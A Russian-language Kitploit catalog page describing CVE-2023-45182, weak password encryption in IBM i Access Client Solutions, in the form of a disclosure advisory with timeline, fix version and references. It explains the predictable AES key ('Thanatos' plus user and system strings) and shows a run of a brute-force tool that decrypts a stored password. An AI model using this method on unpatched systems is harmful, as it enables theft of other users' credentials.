Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - Слабое шифрование паролей | Kitploit
Инструменты/GitHubGitHub/afine-com/cve-2023-45182
Взлом паролейИнструменты шифрования/дешифрованияАнализ уязвимостейЭксплуатацияКриптография
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Слабое шифрование паролей

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Слабое шифрование паролей

Хронология

  • Уязвимость сообщена вендору: 22.09.2023
  • Выпущена исправленная версия 1.1.9.4: 08.12.2023
  • Публичное раскрытие: 15.12.2023

Описание

IBM i Access Client Solutions для хранения пользовательских паролей использует алгоритм AES, однако 16-байтовый ключ шифрования представляет собой комбинацию статической строки (Thanatos) и случайных символов из строки, которая состоит из другой статической строки (Behemoth), объединённой с именем пользователя, домашним каталогом пользователя, ОС (например, Linux) и текущим каталогом, в котором было запущено приложение. В результате половина ключа шифрования является статической (строка Thanatos), а вторая половина очень ограничена. Это позволяет атакующему очень легко подобрать пароль даже на одном ядре CPU.

Ниже приведён пример дешифрования пароля пользователя mmajchrowicz с помощью скрипта as400_password_bruteforce_tool.java, запущенного из учётной записи mkubiak:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

Эта проблема была вызвана использованием слабого шифрования паролей. Данная проблема исправлена в IBM i Access Client Solutions 1.1.9.4.

Затронутые версии

< 1.1.9.4

Рекомендации

Обновите IBM i Access Client Solutions до версии 1.1.9.4 или новее.

Ссылки

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
Скачать инструмент